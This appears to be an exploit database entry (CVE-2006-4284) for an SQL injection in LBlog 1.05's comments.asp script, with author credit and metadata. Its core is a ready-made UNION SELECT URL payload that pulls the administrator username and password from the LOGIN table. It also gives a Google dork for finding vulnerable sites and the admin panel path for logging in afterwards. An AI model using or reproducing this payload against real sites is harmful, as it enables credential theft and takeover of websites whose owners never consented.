LBlog 1.05 - 'comments.asp' SQL Injection

Author: Chironex Fleckeri
type: webapps
platform: asp
port: 
date_added: 2006-08-19  
date_updated:   
verified: 1  
codes: OSVDB-28036;CVE-2006-4284  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2230.txt  
################################################################################
##                                                                            ##

##  LBlog <= "comments.asp" SQL Injection Exploit                             ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##  Credit by        |  Chironex Fleckeri                                     ##

##  Mail             |  ChironeX.FleckeriX@Gmail.Com                          ##

##  Googledork       |  Powered By LBlog                                      ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##                                                                            ##
################################################################################

###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################

#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################

# milw0rm.com [2006-08-20]